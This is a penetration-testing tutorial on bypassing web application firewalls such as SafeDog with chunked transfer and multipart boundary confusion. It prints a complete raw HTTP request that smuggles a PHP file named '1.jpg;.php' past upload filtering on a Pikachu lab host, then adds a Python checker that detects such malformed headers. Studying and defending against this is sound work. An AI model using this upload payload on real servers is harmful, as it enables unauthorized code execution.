This article comes from the Wuwen community (無問社區); more hands-on content and penetration-testing approaches can be found there.
http://www.wwlib.cn/index.php/artread/artid/9960.html
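HTTP chunked transfer bypass
HTTP chunked transfer has long been a classic bypass technique, but in recent years it has been locked down tightly: many WAFs have added detection for it, so chunked transfer on its own no longer works well here. Combined with boundary confusion, though, it works very well.
Plain HTTP chunked transfer (can no longer bypass)
Boundary confusion bypass
Bypassing in combination with publicly available methods
Public bypass 1
A search on Baidu turns up many publicly available methods for bypassing SafeDog (安全狗), but in my own testing they performed very poorly and almost all of them were blocked by SafeDog. So here the SafeDog bypass was achieved through variation plus fuzzing; the code is pasted directly below.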
POST /pikachu-master/vul/unsafeupload/clientcheck.php HTTP/1.1
Host: 192.168.172.161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------378605579232816195651620102739
Content-Length: 448
Origin: http://192.168.172.161
Connection: close
Referer: http://192.168.172.161/pikachu-master/vul/unsafeupload/clientcheck.php
Cookie: PHPSESSID=sop5homauph2bdfeidn6ttv8l1
Upgrade-Insecure-Requests: 1

-----------------------------378605579232816195651620102739
Content-Disposition: form-data; name="uploadfile";fagfhaiofnalkvjoaffufile name=fjalfmavlaa; filename="1.jpg;.php
Content-Type: image/jpeg
GIF89a
]\'
d]\['
/\'
\]']\'
/\]'
w<?php phpinfo();
-----------------------------378605579232816195651620102739
Content-Disposition: form-data; name="submit"
開始上傳
-----------------------------378605579232816195651620102739--
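The request above works only where the filter and the backend parse the malformed Content-Disposition header differently, so the defensive counterpart is to reject any part header that is not strictly well formed. The following is an added example, not code from the original article; the extension lists and function names are assumptions chosen for illustration.

```python
import re

# Strict grammar accepted by this check: form-data; name="..."[; filename="..."]
STRICT = re.compile(r'form-data; name="[^"\\;\r\n]*"(?:; filename="[^"\\;/\r\n]*")?')
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}                  # assumed upload policy
SCRIPT_EXT = {"php", "phtml", "phar", "jsp", "asp", "aspx"}  # assumed deny list


def check_disposition(value):
    """Return the reasons to reject one Content-Disposition header value."""
    value = value.strip()
    reasons = []
    if value.count('"') % 2:
        reasons.append("unbalanced quote")
    if not STRICT.fullmatch(value):
        reasons.append("not strict form-data syntax")
    # Read the file name as a lenient backend might: everything after filename=
    for raw in re.findall(r'filename\*?\s*=\s*([^\r\n]*)', value, re.I):
        tokens = [t.lower() for t in re.split(r'[.;"\s]+', raw) if t]
        if any(t in SCRIPT_EXT for t in tokens[1:]):
            reasons.append("script extension in filename")
        if not tokens or tokens[-1] not in ALLOWED_EXT:
            reasons.append("final extension not allowed")
    return reasons


def scan_parts(body):
    """Map each Content-Disposition line in a multipart body to its reasons."""
    found = {}
    for line in body.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-disposition":
            found[value.strip()] = check_disposition(value)
    return found


# Sample: the two part headers from the request above plus one constructed clean header.
SAMPLE = "\r\n".join([
    'Content-Disposition: form-data; name="uploadfile";fagfhaiofnalkvjoaffufile name=fjalfmavlaa; filename="1.jpg;.php',
    'Content-Disposition: form-data; name="submit"',
    'Content-Disposition: form-data; name="uploadfile"; filename="1.jpg"',
])

if __name__ == "__main__":
    for value, reasons in scan_parts(SAMPLE).items():
        print("REJECT" if reasons else "ok", value, reasons)
```

Rejecting on syntax alone already stops this request; the extension checks are a second layer for headers that are well formed but still name a script file.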